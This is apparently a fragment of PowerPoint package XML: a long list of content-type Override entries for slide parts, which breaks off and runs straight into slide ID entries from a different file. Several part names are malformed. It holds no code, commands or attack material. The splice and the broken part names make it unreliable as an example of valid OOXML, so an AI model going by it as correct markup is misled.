  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide577.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30.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide533.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593.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide433.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide794.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide450.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide734.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09.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide606.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide305.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide666.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide308.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide707.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide3.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide190.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766.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide634.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide723.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide677.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide537.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide565.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide522.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide107.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide662.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549.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide391.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide235.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide650.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide738.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide278.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide693.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide790.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide48.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide291.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide665.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide69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622.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide59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637.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide336.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide778.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide76.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide735.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide750.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide607.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63.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide763.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide464.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide720.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208.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide4.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide678.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide60.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide791.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide609.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide635.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408.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide692.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide277.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide564.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide579.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide620.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide708.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide149.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide663.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide521.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691.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide478.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide664.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide390.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide621.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide736.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide435.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide779.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide463.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide721.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679.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636.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide335.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide591.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide764.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide420.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799.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide504.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide680.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide583.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide601.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide229.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide407.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide648.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide656.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide639.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide575.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide761.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide486.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide737.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide469.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide558.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide98.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide744.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide567.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide590.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide8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752.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide494.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide415.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide729.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671.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566.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide171.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide798.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide327.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide582.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide602.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide559.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide576.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide745.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide99.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide672.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide728.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide655.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide638.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide100.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide762.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416.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide493.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397.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide64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260.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide751.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16.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide247.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468.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide581.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide166.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide603.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide41.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide646.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673.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide754.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide797.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide789.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide488.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide496.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide682.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide727.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide29.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573.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide611.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide654.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide718.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide417.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146.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide746.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide8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569.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580.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45.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide289.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide726.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52.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67.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide760.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681.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide495.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide568.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide674.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide389.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide719.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide604.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide796.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide418.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide647.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide753.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide145.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide747.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239.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide318.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide531.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide653.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide574.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide610.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide489.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide102.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571.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide202.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide741.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide555.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide644.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide369.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756.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide217.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide772.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide281.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide497.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide659.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide23.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide628.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613.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787.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38.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide699.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide701.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72.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide242.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide586.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide129.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide159.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide144.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide458.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716.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide500.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide684.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide353.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide740.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297.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide572.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide554.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide24.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide412.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide153.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27.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide773.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide755.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide498.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide645.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788.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide444.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide702.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide427.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540.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide354.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide698.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide612.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide143.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide587.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide717.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide501.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide683.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide226.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715.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide758.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide529.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide685.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642.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786.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide441.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide743.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide700.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide484.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide328.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide614.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55.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide541.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide584.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide283.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771.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114.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide127.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide59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556.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide801.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457.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide643.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide228.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide60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714.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide757.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide68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629.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570.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide785.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide442.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide742.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide485.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide615.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide658.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide770.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide657.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide356.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide542.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585.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide241.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide81.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide329.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide213.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide557.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide514.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide670.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml" PartName="/ppt/slides/slide800.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 id="667" r:id="rId418"/>
    <p:sldId id="668" r:id="rId419"/>
    <p:sldId id="669" r:id="rId420"/>
    <p:sldId id="670" r:id="rId421"/>
    <p:sldId id="671" r:id="rId422"/>
    <p:sldId id="672" r:id="rId423"/>
    <p:sldId id="673" r:id="rId424"/>
    <p:sldId id="674" r:id="rId425"/>
    <p:sldId id="675" r:id="rId426"/>
    <p:sldId id="676" r:id="rId427"/>
    <p:sldId id="677" r:id="rId428"/>
    <p:sldId id="678" r:id="rId429"/>
    <p:sldId id="679" r:id="rId430"/>
    <p:sldId id="680" r:id="rId431"/>
    <p:sldId id="681" r:id="rId432"/>
    <p:sldId id="682" r:id="rId433"/>
    <p:sldId id="683" r:id="rId434"/>
    <p:sldId id="684" r:id="rId435"/>
    <p:sldId id="685" r:id="rId436"/>
    <p:sldId id="686" r:id="rId437"/>
    <p:sldId id="687" r:id="rId438"/>
    <p:sldId id="688" r:id="rId439"/>
    <p:sldId id="689" r:id="rId440"/>
    <p:sldId id="690" r:id="rId441"/>
    <p:sldId id="691" r:id="rId442"/>
    <p:sldId id="692" r:id="rId443"/>
    <p:sldId id="693" r:id="rId444"/>
    <p:sldId id="694" r:id="rId445"/>
    <p:sldId id="695" r:id="rId446"/>
    <p:sldId id="696" r:id="rId447"/>
    <p:sldId id="697" r:id="rId448"/>
